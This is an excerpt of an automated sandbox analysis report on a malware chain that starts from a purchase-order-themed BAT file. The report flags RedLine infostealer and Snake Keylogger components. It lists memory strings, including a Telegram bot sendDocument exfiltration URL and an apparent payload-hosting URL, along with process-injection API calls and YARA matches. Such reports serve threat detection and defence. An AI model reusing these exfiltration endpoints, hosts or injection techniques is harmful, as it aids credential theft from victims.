                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000E.00000002.2654422100.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2529595198.0000000021DFB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000002.2779535012.0000000002662000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
                      Source: powershell.exe, 0000000E.00000002.2558666717.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000E.00000002.2558666717.0000000004446000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000006.00000002.2450193992.00000000005B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                      Source: x.exe, 00000006.00000002.2508181748.0000000020B7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                      Source: x.exe, 00000006.00000002.2508181748.0000000020B7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                      Source: x.exe, 00000006.00000002.2450193992.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com:443/wps/200_Oupzhkprnvw
                      Source: powershell.exe, 0000000E.00000002.2580997987.0000000005356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49813 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 10.1.rpkhzpuO.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 24.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 24.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 10.1.rpkhzpuO.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 29.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 29.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 29.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 29.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.12.dr 665670656Jump to dropped file
                      Found large BAT file
                      Source: PO#3_RKG367.batStatic file information: 2158506
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C48254 NtReadVirtualMemory,6_2_02C48254
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C484C4 NtUnmapViewOfSection,6_2_02C484C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,6_2_02C4DACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,6_2_02C4DA44
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,6_2_02C4DBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C48BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02C48BB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C479B4 NtAllocateVirtualMemory,6_2_02C479B4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C47D00 NtWriteVirtualMemory,6_2_02C47D00
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C48BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02C48BAE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,6_2_02C4D9F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C479B2 NtAllocateVirtualMemory,6_2_02C479B2
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA8254 NtReadVirtualMemory,21_2_02BA8254
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA84C4 NtUnmapViewOfSection,21_2_02BA84C4
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BADACC NtCreateFile,NtWriteFile,NtClose,21_2_02BADACC
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BADA44 NtDeleteFile,21_2_02BADA44
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA8BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,21_2_02BA8BB0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BADBB0 NtOpenFile,NtReadFile,NtClose,21_2_02BADBB0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA79B4 NtAllocateVirtualMemory,21_2_02BA79B4
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA7D00 NtWriteVirtualMemory,21_2_02BA7D00
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA8BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,21_2_02BA8BAE
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BA79B2 NtAllocateVirtualMemory,21_2_02BA79B2
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 21_2_02BAD9F0 NtDeleteFile,21_2_02BAD9F0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC8254 NtReadVirtualMemory,25_2_02DC8254
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC84C4 NtUnmapViewOfSection,25_2_02DC84C4
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DCDACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,25_2_02DCDACC
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DCDA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,25_2_02DCDA44
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,25_2_02DC8BB0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DCDBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,25_2_02DCDBB0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC79B4 NtAllocateVirtualMemory,25_2_02DC79B4
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC7D00 NtWriteVirtualMemory,25_2_02DC7D00
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,25_2_02DC8BAE
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DCD9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,25_2_02DCD9F0
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 25_2_02DC79B2 NtAllocateVirtualMemory,25_2_02DC79B2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C485DC CreateProcessAsUserW,6_2_02C485DC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C320C46_2_02C320C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00408C6010_1_00408C60
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040DC1110_1_0040DC11
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00407C3F10_1_00407C3F
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00418CCC10_1_00418CCC
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00406CA010_1_00406CA0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004028B010_1_004028B0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0041A4BE10_1_0041A4BE
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0041824410_1_00418244
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040165010_1_00401650
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00402F2010_1_00402F20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004193C410_1_004193C4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0041878810_1_00418788
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00402F8910_1_00402F89
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00402B9010_1_00402B90
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004073A010_1_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_00BBC53013_2_00BBC530
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_00BB2DD113_2_00BB2DD1
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_00BB948013_2_00BB9480
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_00BBC52113_2_00BBC521
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_00BB946F13_2_00BB946F
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C91A013_2_051C91A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 13_2_051C803013_2_051C8030
